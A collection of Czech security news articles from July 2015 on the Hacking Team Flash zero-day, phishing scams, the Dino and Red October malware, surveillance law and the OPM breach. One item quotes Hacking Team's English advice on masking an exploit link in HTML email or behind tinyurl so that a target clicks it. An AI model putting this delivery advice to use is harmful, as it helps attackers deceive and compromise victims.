Zip soubor je chráněn heslem se standardním heslem. Pokud to nevíte, e-mail admin@malware-traffic-analysis.net a zeptat se.

---
Brad Duncan
ISC Handler a bezpečnostní výzkumník u Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: malware_traffic

Reference :

[1] https://krebsonsecurity.com/2015/07/adobe-to-patch-hacking-teams-flash-zero-day/
[2] http://www.pcworld.com/article/2947312/second-flash-player-zeroday-exploit-found-in-hacking-teams-data.html
[3] http://krebsonsecurity.com/2015/02/yet-another-flash-patch-fixes-zero-day-flaw/
[4] http://arstechnica.co.uk/information-technology/2015/06/google-chrome-will-soon-intelligently-block-auto-playing-flash-ads/
[5] http://arstechnica.com/security/2015/07/firefox-blacklists-flash-player-due-to-unpatched-0-day-vulnerabilities/
[6] https://twitter.com/alexstamos/status/620306643360706561
[7] http://malware-traffic-analysis.net/2013/06/18/index.html
[8] http://www.symantec.com/connect/blogs/six-months-after-blackhole-passing-exploit-kit-torch
[9] http://malware-traffic-analysis.net/2014/09/16/index2.html
[10] http://malware-traffic-analysis.net/2014/08/30/index.html
[11] http://malware-traffic-analysis.net/2014/09/08/index2.html
[12] http://malware-traffic-analysis.net/2014/08/15/index.html
[13] http://malware-traffic-analysis.net/2014/09/25/index.html
[14] http://malware-traffic-analysis.net/2014/09/06/index.html
[15] http://malware.dontneedcoffee.com/2015/07/cve-2015-5122-hackingteam-0d-two-flash.html
[16] https://isc.sans.edu/forums/diary/Another+example+of+Angler+exploit+kit+pushing+CryptoWall+30/19863/


Flash Player dostal záplatu kritické chyby, kterou zneužíval Hacking Team

15.7.2015 Zranitelnost
Už na konci minulého týdne se ukázalo, že italská společnosti Hacking Team používala kritickou trhlinu ve Flash Playeru, který slouží k přehrávání videí na internetu. Ten používají po celém světě desítky miliónů lidí. Záplata tehdy chyběla. Společnost Adobe, která za zmiňovaným programem stojí, vydala záplatu až v noci z úterý na středu.
Před nebezpečnou trhlinou varoval Národní bezpečnostní tým CSIRT.CZ, jak Novinky informovaly minulý týden v pátek. [celá zpráva]

„Únik dat ze společnosti Hacking Team odhalil existenci zranitelnosti ve Flash Playeru. Zranitelnost se bohužel týká všech hlavních prohlížečů,“ uvedl již dříve Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Chybu mohou počítačoví piráti zneužít k propašování libovolného škodlivého kódu do cizích počítačů. Zamezit jim v tom má právě uvolněná aktualizace. Stahovat ji je možné přímo ze stránek společnosti Adobe, případně prostřednictvím automatických aktualizací doplňků přímo v prohlížeči.

Špionážní software = miliónový byznys
Kauza okolo uniklé databáze Hacking Teamu ukazuje, jak tenká je hranice mezi počítačovými bezpečnostními experty a plnokrevnými hackery. I když by se mohlo na první pohled zdát, že zmiňovaná italská společnost má blíže k tomu druhému, ve skutečnosti zaměstnanci Hacking Teamu pracovali na obou stranách barikády. Milióny si tak nechali vyplácet dvakrát.

Z uniklé databáze, která obsahuje stovky gigabajtů dat a která koluje od minulého týdne internetem, totiž vyplývá, že nezanedbatelnou část příjmů společnosti Hacking Team tvoří ty z auditorské činnosti. Kromě vývoje šmírovacích programů, které zneužívaly podobných chyb, jako byla ta ve Flash Playeru, totiž italský podnik hodnotil a prověřoval zabezpečení webových stránek i interních systémů firem prakticky ze všech koutů světa.

Detailní plány zabezpečení tak dostali tito bezpečnostní experti naservírované doslova na dlani. Se všemi těmito znalostmi pak pro ně bylo velmi snadné vytvářet tzv. exploity, tedy speciální programy umožňující získat přístup na nejrůznější weby či služby za účelem napadení zmiňovaných subjektů.


UniCredit bank cílem jednoduchého (a účinného) útoku

15.7.2015 Phishing

e-mailů s předmětem Aktualizovat #0084234 z podvržené adresy banky. Zpráva obsahuje jen toto:

unicredit0

Kliknutím na odkaz se dostanete na podvodnou stránku vydávající se za něco, co by mělo připomínat web banky. Pokud vše poctivě vyplníte, jméno, heslo i certifikát jen tak odevzdáte útočníkovi. Ten pak může operovat s penězi na vašem účtu (samozřejmě ještě musí pořešit druhý faktor – mobilní telefon, ale i to dnes není problém).

unicredit1
unicredit2
Na závěr pak dojde k přesměrování na pravou stránku banky – www.unicreditbank.cz.

Jak se říká, opakování je matkou moudrosti (platí pro jakékoliv internetové bankovnictví), tudíž: Přístupové údaje zadávejte jenom do stránky, jejíž adresu ručně vypíšete do prohlížeče. V tomto případě: www.unicreditbank.cz. Jakékoliv odkazy zaslané e-mailem, chatem (ICQ, Skype, …) apod., obzvláště pak v souvislosti s financemi, ignorujte!


Firefox začal natvrdo blokovat Flash, vyčítá Adobe bezpečnostní díry

15.7.2015 Zranitelnosti

Flash se ocitl na seznamu blokovaných zásuvných modulů, uživatel si jej ale může znovu povolit. Opatření je podle Mozilly dočasné.

Znamená to, že ve Firefoxu je teď Flash standardně zablokovaný a pokud jej chce uživatel používat, musí si jej sám v nastavení povolit. V praxi to vypadá tak, že se při příchodu na web např. s flashovým bannerem zobrazí upozornění, že prohlížeč „zabránil spuštění neaktuálního zásuvného modulu“ a uživatel dostane možnost buď v blokování pokračovat, nebo je zrušit.

Podle Schmidta je opatření dočasné: „Aby bylo jasno, Flash budeme blokovat jen do doby, než Adobe uvede verzi, která není zneužitelná veřejně známými bezpečnostními chybami,“ dodal v dalším tweetu. A přidal příslib do budoucna: „Prozatím :)“

Flash je momentálně pod palbou kvůli kritickým zranitelnostem, které zveřejnili hackeři v materiálech uniklých z firmy Hacking Team. A objevují se další a další problémy.

Ústup webových firem od flashové technologie je ale znát už delší dobu – YouTube už jej například nabízí jen jako alternativu k výchozímu HTML5 videopřehrávači. A v neděli na Twitteru Adobe k ukončení vývoje Flashe otevřeně vyzval bezpečnostní šéf Facebooku Alex Stamos.


Google posílil spamfiltry a zpřístupnil nástroj pro analýzu mailingu

15.7.2015 Spam

Systém Gmailu by si teď měl lépe poradit nejen s běžným spamem, ale třeba i s podvrženými bankovními zprávami a phishingem.
Google nasadil na filtrování spamů umělou inteligenci založenou na neuronových sítích, která má přinášet lepší výsledky při rozpoznávání spamu nebo phishingu. Nově má také upravovat filtry na základě preferencí jednotlivých příjemců. Odpadá tak tradiční metoda, která vycházela z hromadných vzorců. Ne všichni vnímají spam stejně a tak vyhodnocování úrovně nevyžádanosti bude vycházet až z chování každého majitele schránky zvlášť.

Google zároveň zpřístupnil nový nástroj pro firmy, které rozesílají velké množství zpráv – ovšem těch legálních, nikoli spamu. Gmail Postmaster Tools jim otevírají nové možnosti k analýze toho, jak jsou jejich maily doručovány.

Nástroj slouží k analýze emailového provozu z jednotlivých domén. Správce se dozví data o reputaci domény i IP adres a míře, s jakou se odeslané zprávy dostávají do složky s názvem Nevyžádaná pošta. „Můžete tak např. snadno identifikovat problém se zabezpečením některého z vašich serverů díky snížené reputaci na konkrétní IP adrese, nebo sledovat, ve kterých dnech byla jaká míra Spam reportů,“ vysvětluje na svém blogu firma Mailkit.

„Pošťácký“ balík ale umí analyzovat i technické problémy související s odesíláním nebo autorizací zpráv. Postmaster Tools odhalí i chyby v konfiguraci DKIM podpisů a SPF pravidel nebo prozradí, jak velký podíl zpráv je autorizován pomocí DMARC.

Služba je podle serveru Techcrunch určena jen pro ověřené rozesílatele mailů. Spammeři by tak měli přijít zkrátka.

Souboj se spamem letos vyostřil i tuzemský Seznam, který zavedl v rámci svého freemailu kontroly prostřednictvím technologie DomainKeys Identified Mail (DKIM). Dlouhodobě totiž do bezplatných schránek na portálu mířilo 81 milionů zpráv denně. Zpráv, které posílají reální lidé, je jen zlomek. Čtyři pětiny e-mailů totiž tvořil spam.


Jaké exploity objednala česká policie? Maily Hacking Teamu jsou na WikiLeaks

15.7.2015 Exploit

Na Wikileaks.org jsou kompletní e-maily z úniku po hacku Hacking Teamu. Zásadním problémem pro Česko je, že prozrazují příliš mnoho o aktivitách Policie.
Pokud si chcete prostudovat komunikaci mezi Hacking Teamem a společností Bull, včetně řady zábavných požadavků na vytvoření exploitů (namátkou žádost o exploity na stránky Komerční banky, Seznam.cz, Otomoto.cz, Parlamentních listů, atd.), stačí jít na search.wikileaks.org/advanced, zaškrtnout pouze „Hacking Team“ v omezení hledání, a pak už jenom zkoušet a zkoušet. Případně hledat přímo pomocí wikileaks.org/hackingteam/emails/.

Pozor, je to hodně dlouhé čtení, které vám vystačí na hodně dlouhou dobu. Dozvíte se v něm řadu věcí, včetně toho, že české „vysoké školy“ vyvíjejí exploity a byl zájem je zahrnout do řešení od HT. Desítky e-mailů probírají cenu, dodací podmínky, školení „zákazníka“ v tom, jak konkrétně hackovat, jak do stránek vsouvat útočné kódy nebo jak uživateli zablokovat přehrávání YouTube, aby si stáhl falešný Flash.

The attachment contains TXT file with the infecting URL.

Don't put this link on public websites or social networks (Facebook, Twitter), it is unsafe for you and it could be triggered by automatic bots. For delivering it, to a real target, we suggest you to create an html e-mail with an hyperlink to this URL, because otherwise it might look malicious: in the attachment you will also find a sample html code you can use to insert the link and mask it in a html email. For sending html mail via web-mail (eg: gmail) please refer to the message previously posted.

If html sending is not possible (eg: via Skype chat), we suggest to use tinyurl (tinyurl.com) to mask the real URL. The exploit will be available only for a limited period of time.

Požadavky na exploity, tedy na vytvoření specifického řešení, které v uniklých mailech najdete, se týkají vytváření útočného kódu pro specifické weby, prohlížeče, ale také pro Microsoft Word či Power Point.

Bez zacházení do detailů je dost zřejmé, že pokud si tuto komunikaci mezi Policií ČR a „servisním“ portálem Hacking Teamu přečtou například obhájci lidí, kterých se „hackování“ a sledování týkalo, budou mít informace, které mohou celý výsledek vyšetřování ohrozit. Mimo požadavků najdete v e-mailech i odpovědi, včetně připravených exploitů, informací o tom, jak je nasadit a čeho se vyvarovat.

Je hodně zvláštní, že komunikace obsahující velmi citlivé a konkrétní informace týkající se kriminálního vyšetřování probíhala v nezabezpečené podobě. Celé to navíc vyvolává řadu dalších otázek. K umístění některých exploitů musela mít policie spolupracující subjekt – řekněme, že pokud by chtěla umístit exploit přímo na webové stránky nějakého média, bylo by to bez spolupráce dost nepravděpodobné. Byť samozřejmě můžete uvažovat nad tím, že by mohlo dojít nejprve k hacknutí média, a až poté k umístění exploitu.

Je tu samozřejmě také varianta, že policie má přístup přímo k internetové komunikaci (ale nemá přístup ke koncovému zařízení sledované a vyšetřované osoby) a někde „cestou“ dokáže podvrhovat obsah. Což je ale nakonec stejně alarmující věc, jako ta předchozí.

Je také milé vidět, jak aktivní jsou české univerzity či vysoké školy, když jde o otázku hackingu. Ale tady se opět nabízí otázka, jak asi bude těm, kteří chtěli obchodovat s Hacking Teamem, když si uvědomí, že jejich práce mohla dobře sloužit represivním režimům ke stíhání disidentů, potlačování občanských svobod a řadě dalších věcí, které jsou s naším pojetím světa dost neslučitelné.

Bude zajímavé sledovat, kolik z řešených případů, které se objevují rozpoznatelné v e-mailech uniklých z Hacking Teamu, bude tímto únikem zmařeno. A zda za toto fatální selhání bude někdo zodpovědný.


Nizozemí chce uzákonit plošné šmírování, včetně prolamování šifrování

15.7.2015 Zákony

Plošné šmírování, povinnost vydávat metadata o uživatelích, povinnost na základě požadavku dešifrovat data. Vítejte ve svobodné Evropě.
Ars Technica v New Dutch law would allow bulk surveillance, compelled decryption komentuje návrh nového nizozemského zákona, který by měl aktualizovat stávající zákon platný od roku 2002.

Jakkoliv jde teprve o návrh vstupující do fáze veřejných konzultací, je už dnes jasné, že tamní zákonodárci se rozhodli velmi výrazně přitlačit. Nový zákon například chce přijít s možností plošného šmírování, kde by spolupráce byla vyžadována nejenom od provozovatelů veřejných komunikačních sítí a služeb, ale také od provozovatelů uzavřených skupin, poskytovatelů hostingových služeb i operátorů webů.

V novém zákonu se objevuje přímé povolení odposlechů – s použitím prakticky jakýchkoliv dostupných prostředků, v rámci jakýchkoliv forem telekomunikace či přenosů dat, dokonce bez ohledu na umístění. Jediné omezení, které zákon zmiňuje, je, že odposlechy jsou možné pouze, pokud je znám účel, ale nijak není určeno, jaký účel to má být, ani jak bude toto hlídáno a řešeno.

Dále čtěte: Policie ČR: Šmírovací software jsme koupili, ale vše je tajné, nic neřekneme

V zákoně se objevuje navíc to, že poskytovatelé komunikačních služeb musí na žádost orgánů poskytovat uživatelská metadata, včetně umožnění jejich následné automatické analýzy. O jaká metadata jde? To bude prý určeno později.

Ještě závažnější je to, že tajné služby mohou požadovat pomoc při dešifrování dat v počítačových systémech, konverzacích, telekomunikačních službách či datových přenosech – ať již předáním klíčů nebo poskytnutím dešifrovaných dat atd. A podobně jako anglické tajné služby mohou hackovat systémy a být právně nepostižitelné, chystá obdobná pravidla i tento zákon.

Další informace též viz. Dutch intel bill proposes non-specific (‘bulk’) interception powers for “any form of telecom or data transfer”, incl. domestic, plus required cooperation from “providers of communication services”.


Vyhrát iPhone 6? Pomoci v soutěži? Kdeže, jen prozradíte své heslo

15.7.2015 Podvod

Hacknuté účty na Facebooku i sdílení důvěřivci, takové jsou důsledky nové „soutěže“ o iPhone 6. Nebo prostě jenom žádosti o pomoc v hlasování.
„Můžu tě poprosit o hlas v soutěži? Musíš se přihlásit jako na Facebook a dát hlasovat… http://freeiphone6.ic.cz/index.html Děkuju moc a pošli to dál“. A nepoučitelní důvěřiví lidé to posílají dál a dál. A pokud stejně ochotně vyplňují do formuláře (byl vytvořen v Google Docs) své přihlašovací údaje z Facebooku, tak už těžko získají účet zpět.

Na výše uvedené adrese (šíří se ještě s parametrem v URL, který může být různý) najdete formulář, ten se jednoduše ptá na jméno a heslo.
Vyplníte, poděkuje vám, přesměruje vás to na skutečný Facebook a tím to, zdánlivě, končí.
Pokud jste, promiňte mi tu příkrost, byli tak hloupí a vyplnili do tohoto formuláře své přihlašovací údaje na Facebook, máte prostě smůlu. Předali jste je někomu, kdo je získal tak snadno, že se tomu nechce věřit. A pokud bude rychlejší než vy, tak už svůj účet na Facebooku nikdy neuvidíte.

Pokud budete dostatečně rychlí, tak ho ještě můžete zachránit. Ale nebude stačit jenom změnit heslo pro Facebook, velmi pravděpodobně jste totiž prozradili i přihlašovací údaje do dalších služeb. Tady poradí Co udělat, když se někomu podařilo získat moje heslo do nějaké online služby a vůbec to neberte na lehkou váhu.

Mimochodem, už jste si svůj účet na Facebooku (ale nejenom tam) zabezpečili dvoufaktorovým přihlašováním? Tedy tím, že každé nové přihlášení bude nutné potvrdit kódem z vašeho mobilního telefonu? Je to dost dobrý nápad, nejenom pro Facebook.


Nový špionážní malware pod lupou

14.7.2015 Viry
Analytici analyzovali malware Dino, používaný k přesně cíleným špionážním útokům. Jak tedy vlastně funguje?

Dino je špionážní malware, blízce příbuzný s dříve odhalenými softwarovými špionážními nástroji Casper, Bunny nebo Babar. Podrobněji se na něj podívali experti z firmy Eset.

Sdílené části kódu ukazují, že za jejich vývojem stojí špionážní skupina, podle všeho francouzsky mluvící, známá v bezpečnostní komunitě jako Animal Farm.

Dino je malware typu backdoor – tedy malware, který umožňuje útočníkovi nepozorovaný přístup do systému. „Komplexní backdoor, jakým je například analyzovaný Dino, umožňuje plné převzetí kontroly nad počítačem,“ komentuje Joan Calvet, analytik Esetu, který se podílel na rozkrytí fungování nového malware.

Dino má modulární strukturu a obsahuje řadu inovací, jimiž se odlišuje od svých příbuzných. Velice zajímavý je třeba modul vytvářející specializovaný souborový systém uložený v paměti, který umožňuje úspěšně tajit vykonávané operace. Dino disponuje také modulem plánovače úloh inspirovaným zjevně aplikací Cron známou z unixových systémů.
 

Zlepšení doznal také vyhledávací modul. Hromadné prohledávání souborů v infikovaných počítačích je pro hackery prakticky stejně komfortní jako pro legitimního uživatele vyhledávání v jeho vlastním počítači. Hledat je možné podle typu souboru, částí názvů, velikosti nebo data poslední změny.

„Hledání konkrétních souborů a jejich odesílání na řídící servery je pro tento malware evidentně tím klíčovým úkolem,“ uvádí Calvet.

Dino nepatří k mezi malware, určený k masovému rozšíření - naopak, najít jeho vzorky je obtížné. Jde totiž o specializovaný malware, určený k dlouhodobému působení v systémech, které byly předtím detailně zmapovány s využitím „lehčího“ malware.

Většina dosud známých cílů útoků s využitím malwaru Dino je v Íránu; jsou to instituce, které mají blízko k jadernému průmyslu a souvisejícímu výzkumu.


Příběhy, které se opravdu staly: Hon na Rudý říjen

14.7.2015 Kyber špionáž
Za poslední roky dramaticky narostl význam špionáže s pomocí kybernetických prostředků. Cílené škodlivé kódy velmi promyšleným způsobem napadají diplomatické sítě, výzkumné ústavy, průmyslové podniky. Svědčí o tom i kybernetická síť s velmi širokým záběrem a sofistikovanými úkoly, která dostala název Red October – Rudý říjen.

Název je odvozený od slavné fiktivní ponorky z románu Toma Clancyho. V pojmenování je jistá symbolika: špionážní síť byla odkrytá v říjnu 2012 a její stopy vedou právě do Ruska. Pikantní přitom je, že ji odhalila ruská bezpečnostní firma Kaspersky Lab.

Záběr získávaných informací byl přitom velmi široký a kromě výše uvedených sektorů zahrnoval také organizace působící v oblasti energetiky, jaderného průmyslu, obchodní firmy a letecko-kosmický sektor.

Špionáž se uskutečňovala s pomocí malwaru pojmenovaného jako Rocra, který představoval modulární systém – a především měl unikátní vlastnosti.

Když síť objevili, bezpečnostní experti se rozhodli nezasahovat hned, ale ponechat informaci o její existenci ještě dva měsíce v utajení. To jim umožnilo zmapovat celý systém fungování a udělat jeho podrobnou analýzu. Ta odhalila mnoho netušených souvislostí, které by při rychlém zveřejnění mohly uniknout.

Podařilo se například dohledat, že systém fungoval nejméně od května 2007 – možná i dříve. Šlo tedy o dalšího „kostlivce v bezpečnostní skříni“, který opět rozvířil otázku, kolik takových zůstává neobjevených.

Práce i na pozadí

Kromě tradičních stolních počítačů se jako první podobný odhalený systém Rudý říjen zaměřoval také na vytěžování dat z mobilních zařízení, jako jsou třeba chytré telefony (iPhone, Nokia, Windows Mobile), sledoval síťové prvky (směrovače, přepínače) a na základě těchto informací pak chystal „útoky na míru“, sbíral data i z vyjímatelných disků, dokonce obnovoval smazané soubory, jež také odesílal.

Zajímavá byla i práce se získanými údaji – útočníci je ukládali a neustále se k nim vraceli. Především pak k informacím o síti, přihlašovacích prvcích nebo zvycích uživatelů/správců. To jim umožnilo vytvářet velmi přesné obrazy systémů, na které útočili.

Docházelo například k analýzám používaných hesel a vyhledávání zákonitostí v nich. Útočníci také podle všeho vykonávali před vlastním napadením „průzkum bojem“, kdy s pomocí různých jednoduchých triků skládali obraz vybraného systému. Vlastní útok pak dělali „na jisto“.

K řízení sítě infikovaných počítačů se vytvořila síť šedesáti serverů v různých zemích; nejvíce z nich bylo v Německu a Rusku. Ty fungovaly v proxy režimu, aby co nejvíce skryly mateřské řídicí centrum. Zda se podařilo vystopovat i to, bezpečnostní specialisté neuvedli. Sdělili ale, že zjištěné počty jsou zřejmě jen pověstnou špičkou ledovce.

I tak se ale odhalily stovky napadených systémů především ve východní Evropě, ale i v Severní Americe, západní Evropě a v některých asijských zemích. O jaké instituce šlo, se veřejně nepropagovalo, ovšem mezi kradenými soubory byl i formát acid, který používají pro šifrovanou komunikaci třeba NATO nebo orgány Evropské unie.
 

Během dvou měsíců monitorování systému se k výše uvedeným řídicím serverům připojilo 250 různých infikovaných zařízení ze 39 zemí, které uskutečnily 55 tisíc relací.

K infikaci vybraných systémů docházelo formou cíleného phishingu, kdy byl v přiloženém dokumentu umístěný na míru dotyčnému systému vytvořený trojský kůň. Zajímavé je, že základní konstrukce malwaru Rocra je podobná jiným kódům, které se už dříve zaměřovaly na monitorování tibetských aktivistů nebo vojenských či energetických institucí v Asii.

Možná šlo o stejný zdroj útoků, možná jen o stejnou školu – ale dost možná že šlo o prachobyčejné opisování. I v oblasti kybernetických útoků totiž platí, že není třeba objevovat Ameriku a že když něco funguje, je dobré na tom stavět dál.

Jenže tentokrát se „opisování“ vymstilo, protože podobný kód byl detekovaný už v roce 2011 a bezpečnostní specialisté tak měli alespoň hrubou představu, co hledat.

Zajímavé také je, že k odhalení některých instalací Rocry došlo díky cloudovým a crowdsourcingovým webovým službám (doporučujeme v této souvislosti článek Síla davu v bezpečnosti na jiném místě tohoto SecurityWorldu). Právě možnost práce s větším množstvím dat a důraz na jinak bezvýznamné symptomy umožnil odhalit instalace i tam, kde by jinak spolehlivě ušly pozornosti.

Unikátní mechanismy

Samotný kód Rocra využíval unikátní architekturu i funkcionality, se kterými jsme se dodnes nikde jinde nesetkali. Využíval třeba „návratový mód“: po instalaci do počítače vložil drobný plug-in do Adobe Readeru a MS Office. Pokud pak byl hlavní kód odhalený, odstraněný a došlo k záplatování systému, tento plug-in zpravidla v systému zůstal.

Nic nenasvědčovalo tomu, že by měl spojení s útokem. Agresoři pak na infikované zařízení poslali dokument s nenápadným aktivačním mechanismem: když byl otevřený, plug-in se probudil k životu a pokusil se zvenčí Rocru opět stáhnout.

„Spící agent“ uvnitř systému přitom představuje noční můru všech bezpečnostních specialistů, třeba právě s ohledem na neviditelnou spojitost s útočným kódem a trpělivé čekání. Aktivace se navíc dělá skrze smluvené znamení v dokumentu. A to je něco, co se prostě bezpečnostními prostředky odhalit nedá.

A propos, Rudý říjen zasahoval i do České republiky, kde bylo „méně než pět infekcí“. Podotýkáme ale, že těch objevených.


Vyvarujte se "nejhorších postupů" v oblasti bezpečnosti

14.7.2015 Hrozby
V souvislosti s doporučenými postupy je většinou řeč o „best practices“; tedy o procesech, jež se už jinde osvědčily a které tak není nutné pracovně znovuobjevovat. Ovšem zkusme se na celou věc podívat přesně opačnou praktikou: skrze „worst practices“, tedy ty nejhorší postupy.

Mnohdy máme bezpečnostní politiku, ale nikoliv bezpečnostní koncepci. V praxi to pak vypadá tak, že „najdu chybu, koupím produkt“. Vychází to i z logiky, že po incidentu se mnohem snáze argumentuje u vedení firmy s tím, že musíme udělat všechno pro to, aby se něco podobného neopakovalo.

Druhá logika za touto filozofií je, že na každý problém existuje nástroj. To ale není pravda. Nástroje totiž někdo konfiguruje a monitoruje. Jinými slovy: nástroje tu jsou pro to, aby pomáhaly, a ne aby nahrazovaly nebo vykonávaly.

Třeba IDS a IPS (a nazvěme je, jak chceme) nejsou po vybalení připravené a je třeba je nakonfigurovat na to, co mají dělat a co mají hledat. A i nadále je o ně třeba pečovat. Když už nic jiného, pak neustále studovat a vyhodnocovat logy – a na jejich základě zpětně donekonečna systémy ladit.

Druhou základní chybou je ignorování lidského faktoru. Příklad? Vynucování dlouhého a často měněného hesla, které se navíc nesmí opakovat. Z čistě technicistního pohledu je to správné, ale...

Opravdu dáte ruku do ohně za to, že uživatelé se každé dva týdny (nebo i častěji) budou nazpaměť drtit čtrnáctiznakové heslo? Brzy si najdou způsob, jak systém obejít, a heslo si budou poznamenávat, sdílet, budou používat velmi podobná hesla...

Chyby autoritativního přístupu

Právě postup „nastavíme“, „zablokujeme“ a „zakážeme“ je pro mnoho řešení bezpečnostních problémů typický. Jenže prosazování politiky není tak jednoduché: ostatně když administrátor nedokáže správně nastavit stroj, aby něco zablokoval (protože to třeba nejde nadefinovat, např. „podezřelé přílohy“), přece to nemůže chtít po uživatelích bez technického vzdělání.

Nesmíme zkrátka zapomínat na to, že některé politiky jsou technické (změňte heslo!), některé organizační (nepište si heslo na žluté papírky!). A že jsou si rovnocenné.

Ostatně právě autoritativní přístup ze strany IT oddělení je dalším častým prohřeškem. „Ve jménu bezpečnosti, to se nesmí!“ Nehledá se pak řešení, hledá se tlačítko „vypnout“.

Někteří IT manažeři prosazují klasický český přístup „ano, ale“. S navrženým požadavkem souhlasí, ale ihned přidávají vyjádření rizika a dotaz, zda si tazatel vezme na své triko zodpovědnost za případné problémy.

Což je ovšem druhý extrém, protože cokoliv jiného než zákaz s sebou vždy nese bezpečnostní riziko. „Best practice“ se v daném případě ovšem hledá těžko: mohli bychom hovořit o nutnosti nalézat řešení nebo domluvit se na kompromisu, ovšem všichni víme, jak podobným poučkám navzdory svět skutečně funguje. Nejlepším způsobem dosažení cíle tak zřejmě zůstává metoda postupných kroků.

Všechna data jsou si rovná, představuje další nesprávný – ale hojně využívaný – předpoklad. Ano, detailní rozpočty obchodních nabídek jsou si rovné s žádostmi o dovolené. Ne? Samozřejmě máte pravdu.
 

Ovšem nejde jen o různé úrovně důležitosti dat, ale třeba i o rovnost elektronických a tištěných dat. Jednou se klade důraz na jednu kategorii, jindy na druhou, ale bohužel se lze jen vzácně setkat se situací, kdy se řeší rovným způsobem.

Není tomu tak dávno, co útočníci získávali informace cestou dumpster divingu, volně „ponoření se do odpadků“. Interní telefonní seznamy, rozpracované nabídky nebo kartičky s narychlo zapsanými údaji končily v odpadkových koších a následně v popelnicích. Pak se pozornost přesunula k nezabezpečeným elektronickým datům a dnes se opět vrací k odpadkovým košům.

Nepravidelné dělání auditů a penetračních testů představuje další častý hřích. Komplexnost dnešních systémů dramaticky narůstá, aktualizace či modernizace jsou velmi časté.

Dříve dostačující dva roky mezi audity se proto jeví až jako nekonečně dlouhé. Obecně je lepší provádět je každý rok – a v případě výrazných změn i častěji. Stejně tak je třeba kontrolu svěřit do ruky třetí strany.

Nerado to dělá vedení firmy („stojí to peníze“), neradi to dělají administrátoři (formálně tvrdí, že to zvládnou sami, reálně si nechtějí nechat nahlížet do karet). Ovšem myšlenka „je dobrý, tak ať si zkontroluje svoji vlastní práci“ asi není úplně nejlepší.

Neviditelná bezpečnost

Minimálně diskutabilní je neviditelná bezpečnost. Tedy taková opatření, která nejsou vidět. Druhým extrémem je pochopitelně nekonečné přihlašování do různých systémů, vyskakování varovných hlášení nebo informací, že to a to bylo prověřené.

Jenže když bezpečnost uděláme „neviditelnou“, má to své negativní důsledky. V uživatelích převládne dojem, že žijí v divokém světě a že si mohou dovolit všechno. „Občasné upozornění na prohřešky třeba s návštěvou nepovolených stránek nebo ukládáním nelegálního obsahu udělá zázraky,“ shodují se bezpečnostní specialisté.

Třeba pouhým nasazením systému monitorování a klasifikace internetového provozu dochází typicky k jeho poklesu o dvě třetiny. Jenže po nějakém čase se uživatelé osmělí a provoz roste: samozřejmě že správně pak není nasadit další systém, ale elegantně jim jeho prostou existenci připomenout.

Není přitom nutné rozdávat exemplární tresty: často stačí jen upozornit, šeptanda pak vykoná své…


Ochráníme i těžko přístupné průmyslové IT systémy, slibuje Check Point

14.7.2015 Hardware
Bezpečnostní bránu 1200R, řešící zabezpečení průmyslových řídicích systémů (ICS) provozovaných v nejnáročnějších podmínkách, představil Check Point.

ICS využívají různé elektrické, dopravní a vodní systémy, takže útok, ať už fyzický nebo virtuální, má potenciál ochromit celý region nebo vypnout rozvodnou síť země a narušit kritické systémy a výrobní linky.

Model 1200R je podle výrobce specializovaná bezpečnostní brána určená pro nepřístupná a drsná prostředí a vzdálené nasazení, jako například v odlehlých elektrických rozvodnách nebo v závodech pro výrobu elektrické energie.

Doplňuje tak další produkty Check Pointu pro ICS a SCADA dodávaných formou softwarových bladů Firewall a Application Control a přes 200 specifických IPS signatur pro SCADA systémy.

Check Point nabízí komplexní informace o SCADA provozu i formou specializovaných zpráv o hrozbách v rámci řešení Next Generation SmartEvent.

Podle Gartneru bude „nadále docházet k narušení kybernetické bezpečnosti kritických průmyslových infrastruktur, což bude mít za následek po celém světě do roku 2019 ekologické události za více než 10 miliard dolarů, katastrofální ztráty na životech – a také bude potřeba přijmout nová nařízení.“

V roce 2014 zaznamenal ICS-CERT 245 nahlášených incidentů spojených s průmyslovými řídicími systémy v odvětvích, jako jsou výroba, energie, voda a doprava. Více než polovinu těchto incidentů způsobily pokročilé přetrvávající hrozby (APT) nebo sofistikované formy útoků.

Průmyslové řídicí systémy jsou typicky hůře zabezpečené a velmi zranitelné. Problémem je stárnutí softwaru a operačního systému, navíc obvykle nedochází k pravidelným aktualizacím a záplatám. Pokud dojde k aktualizaci, fixační záplaty ICS systémů vytváří dlouhé okno, někdy i roky, kdy jsou tyto systémy otevřené útokům.

„Jakmile kyberzločinci získají přístup k řídicímu systému, je škoda nevyhnutelná. Následky narušení bezpečnosti ICS budou drtivé. A není to otázka ‚jestli se to stane‘, ale ‚kdy se to stane‘, “ říká Dorit Dorová, produktová viceprezidentka společnosti Check Pointu.

Klíčové vlastnosti 1200R podle dodavatele:

Plně vybavená bezpečnostní brána s porty 6x1GbE a propustností firewallu 2Gb/s
Široká podpora specifických protokolů pro ICS/SCADA na trhu, včetně Modbus, MMS, DNP3, IEC 60870-5-104, IEC 61850, ICCP, OPC, BACnet, Profinet, Siemens Step7 a mnoha dalších
Kompaktní forma, bez ventilátorů a bez pohyblivých částí konstrukce překonává běžné standardy a přináší i extrémní rozsah provozních teplot od -40°C do 75°C
Brána je v souladu s těmi nejpřísnějšími předpisy: IEC 61850-3, IEEE 1613 a IEC 60068-2


Hackeři při útoku na OPM ukradli citlivé informace o více než dvaceti milionech Američanů

15.7.2015 Incidenty
Americká vládní agentura Office of Personnel Management (OPM), která se mimo jiné zabývá správou citlivých osobních údajů federálních zaměstnanců, oznámila, že hackeři při nedávném útoku na její systémy ukradli informace o více než dvaceti milionech lidí.

Vyšetřovatelé uvedli, že hackeři „s velkou pravděpodobností“ při nedávném útoku ukradli citlivé údaje 21,5 milionů Američanů. Útočníci získali informace o lidech, kteří si požádali u OPM o bezpečnostní prověrku včetně údajů o jejich známých - partnerech či přátelích, kteří byli při udělování prověrek taktéž prověřováni. Jak uvedlo OPM, útočníci tak získali data o téměř každém, kdo si u něj od roku 2000 zažádal o bezpečnostní prověrku. Hackeři se mimo jiné také dostali k 1,1 milionům otisků prstů.

OPM se stará o velkou většinu bezpečnostních prověrek pracovníků americké vlády, ale i potenciálních zaměstnanců a subdodavatelů, kteří s tamní vládou spolupracují. Při udělování prověrek musejí lidé poskytnout například podrobné informace o své finanční situaci či historii užívání drog.

